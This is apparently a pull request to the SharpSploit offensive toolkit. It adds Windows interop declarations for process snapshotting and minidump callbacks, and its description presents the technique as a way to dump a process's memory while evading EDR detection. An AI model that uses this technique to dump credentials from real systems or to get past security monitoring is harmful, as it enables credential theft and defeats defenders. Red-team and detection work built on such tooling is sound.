### PR TITLE
PssCaptureSnapshot + MiniDumpWriteDump = CreateProcessSnapDump

### DIFF
--- a/SharpSploit/Enumeration/Host.cs
+++ b/SharpSploit/Enumeration/Host.cs
@@ -14,7 +14,6 @@ using System.Runtime.InteropServices;
 using SharpSploit.Generic;
 using SharpSploit.Execution;
 using PInvoke = SharpSploit.Execution.PlatformInvoke;
-using Microsoft.PowerShell.Commands;
 
 namespace SharpSploit.Enumeration
 {

--- a/SharpSploit/Enumeration/Host.cs
+++ b/SharpSploit/Enumeration/Host.cs
@@ -417,11 +417,8 @@ namespace SharpSploit.Enumeration
             PInvoke.Win32.Kernel32.PssFreeSnapshot(Process.GetCurrentProcess().Handle, snapshotHandle);
             PInvoke.Win32.Kernel32.CloseHandle(vaCloneHandle);
             
-            //Process.GetProcessById(cloneProcessId).Kill();
-
             Marshal.FreeHGlobal(pCallbackInfo);
             GC.KeepAlive(CallbackInfo);
-
         }
 
         /// <summary>

--- a/SharpSploit/Execution/PlatformInvoke/Win32.cs
+++ b/SharpSploit/Execution/PlatformInvoke/Win32.cs
@@ -182,6 +182,19 @@ namespace SharpSploit.Execution.PlatformInvoke
             public static extern Int32 PssCaptureSnapshot(
                 IntPtr ProcessHandle, Execution.Win32.Kernel32.PSS_CAPTURE_FLAGS CaptureFlags, Int32 ThreadContextFlags, out IntPtr SnapshotHandle
             );
+
+            [DllImport("kernel32")]
+            public static extern Int32 PssFreeSnapshot(
+                IntPtr ProcessHandle, IntPtr SnapshotHandle
+            );
+
+            [DllImport("kernel32")]
+            public static extern Int32 PssQuerySnapshot(
+                IntPtr SnapshotHandle, Execution.Win32.Kernel32.PSS_QUERY_INFORMATION_CLASS InformationClass, out IntPtr Buffer, Int32 BufferLength
+            );
+
+            [DllImport("kernel32")]
+            public static extern Int32 GetProcessId(IntPtr hObject);
         }
 
         public static class User32

--- a/SharpSploit/Execution/PlatformInvoke/Win32.cs
+++ b/SharpSploit/Execution/PlatformInvoke/Win32.cs
@@ -177,6 +177,11 @@ namespace SharpSploit.Execution.PlatformInvoke
             public static extern void GetNativeSystemInfo(
                 ref Execute.Win32.Kernel32.SYSTEM_INFO lpSystemInfo
             );
+
+            [DllImport("kernel32")]
+            public static extern Int32 PssCaptureSnapshot(
+                IntPtr ProcessHandle, Execution.Win32.Kernel32.PSS_CAPTURE_FLAGS CaptureFlags, Int32 ThreadContextFlags, out IntPtr SnapshotHandle
+            );
         }
 
         public static class User32

--- a/SharpSploit/Execution/Win32.cs
+++ b/SharpSploit/Execution/Win32.cs
@@ -203,6 +203,18 @@ namespace SharpSploit.Execution
                 PSS_CREATE_MEASURE_PERFORMANCE = 0x40000000,
                 PSS_CREATE_RELEASE_SECTION = 0x80000000
             }
+
+            public enum PSS_QUERY_INFORMATION_CLASS
+            {
+                PSS_QUERY_PROCESS_INFORMATION = 0,
+                PSS_QUERY_VA_CLONE_INFORMATION = 1,
+                PSS_QUERY_AUXILIARY_PAGES_INFORMATION = 2,
+                PSS_QUERY_VA_SPACE_INFORMATION = 3,
+                PSS_QUERY_HANDLE_INFORMATION = 4,
+                PSS_QUERY_THREAD_INFORMATION = 5,
+                PSS_QUERY_HANDLE_TRACE_INFORMATION = 6,
+                PSS_QUERY_PERFORMANCE_COUNTERS = 7
+            }
         }
 
         public static class User32

--- a/SharpSploit/Execution/Win32.cs
+++ b/SharpSploit/Execution/Win32.cs
@@ -178,6 +178,31 @@ namespace SharpSploit.Execution
                 QueryLimitedInformation = 0x0800,
                 All = StandardRights.Required | StandardRights.Synchronize | 0x3ff
             }
+
+            [Flags]
+            public enum PSS_CAPTURE_FLAGS : uint
+            {
+                PSS_CAPTURE_NONE = 0x00000000,
+                PSS_CAPTURE_VA_CLONE = 0x00000001,
+                PSS_CAPTURE_RESERVED_00000002 = 0x00000002,
+                PSS_CAPTURE_HANDLES = 0x00000004,
+                PSS_CAPTURE_HANDLE_NAME_INFORMATION = 0x00000008,
+                PSS_CAPTURE_HANDLE_BASIC_INFORMATION = 0x00000010,
+                PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION = 0x00000020,
+                PSS_CAPTURE_HANDLE_TRACE = 0x00000040,
+                PSS_CAPTURE_THREADS = 0x00000080,
+                PSS_CAPTURE_THREAD_CONTEXT = 0x00000100,
+                PSS_CAPTURE_THREAD_CONTEXT_EXTENDED = 0x00000200,
+                PSS_CAPTURE_RESERVED_00000400 = 0x00000400,
+                PSS_CAPTURE_VA_SPACE = 0x00000800,
+                PSS_CAPTURE_VA_SPACE_SECTION_INFORMATION = 0x00001000,
+                PSS_CREATE_BREAKAWAY_OPTIONAL = 0x04000000,
+                PSS_CREATE_BREAKAWAY = 0x08000000,
+                PSS_CREATE_FORCE_BREAKAWAY = 0x10000000,
+                PSS_CREATE_USE_VM_ALLOCATIONS = 0x20000000,
+                PSS_CREATE_MEASURE_PERFORMANCE = 0x40000000,
+                PSS_CREATE_RELEASE_SECTION = 0x80000000
+            }
         }
 
         public static class User32
@@ -519,6 +544,70 @@ namespace SharpSploit.Execution
                 MiniDumpFilterTriage = 0x00100000,
                 MiniDumpValidTypeFlags = 0x001fffff
             }
+
+            public enum MINIDUMP_CALLBACK_TYPE : uint
+            {
+                ModuleCallback,
+                ThreadCallback,
+                ThreadExCallback,
+                IncludeThreadCallback,
+                IncludeModuleCallback,
+                MemoryCallback,
+                CancelCallback,
+                WriteKernelMinidumpCallback,
+                KernelMinidumpStatusCallback,
+                RemoveMemoryCallback,
+                IncludeVmRegionCallback,
+                IoStartCallback,
+                IoWriteAllCallback,
+                IoFinishCallback,
+                ReadMemoryFailureCallback,
+                SecondaryFlagsCallback,
+                IsProcessSnapshotCallback,
+                VmStartCallback,
+                VmQueryCallback,
+                VmPreReadCallback,
+            }
+
+            public struct MINIDUMP_CALLBACK_INFORMATION
+            {
+                public MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
+                public IntPtr CallbackParam;
+            }
+
+            [StructLayout(LayoutKind.Explicit, Pack = 4)]
+            public struct MINIDUMP_CALLBACK_OUTPUT
+            {
+                [FieldOffset(0)]
+                public int Status; // HRESULT
+            }
+
+            [StructLayout(LayoutKind.Explicit)]
+            public struct MINIDUMP_CALLBACK_INPUT
+            {
+
+                const int CallbackTypeOffset = 4 + 8;
+
+                const int UnionOffset = CallbackTypeOffset + 4;
+
+                [FieldOffset(0)]
+                public uint ProcessId;
+                [FieldOffset(4)]
+                public IntPtr ProcessHandle;
+                [FieldOffset(CallbackTypeOffset)]
+                public MINIDUMP_CALLBACK_TYPE CallbackType;
+
+                [FieldOffset(UnionOffset)]
+                public int Status; // HRESULT
+            }
+
+            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+            [return: MarshalAs(UnmanagedType.Bool)]
+            public delegate bool MINIDUMP_CALLBACK_ROUTINE(
+                [In] IntPtr CallbackParam,
+                [In] ref MINIDUMP_CALLBACK_INPUT CallbackInput,
+                [In, Out] ref MINIDUMP_CALLBACK_OUTPUT CallbackOutput
+                );
         }
 
         public class WinBase


### PR DESCRIPTION
Creates a snapshot of the targeted process using `PssCaptureSnapshot` (Windows 8.1+ and Windows Server 2012+) and dumps it using `MiniDumpWriteDump`. The snapshot is cleaned after the dump.

By using this technique we avoid running `MiniDumpWriteDump` directly over the targeted process, which should bypass certain checks done by EDRs (note `PssCaptureSnapshot` still reads the process, so access-related events may appear).

More info [Here](https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/)

![snapDump](https://user-images.githubusercontent.com/35996395/94165118-2b159c80-fe8a-11ea-8196-9400c0c7ab82.png)
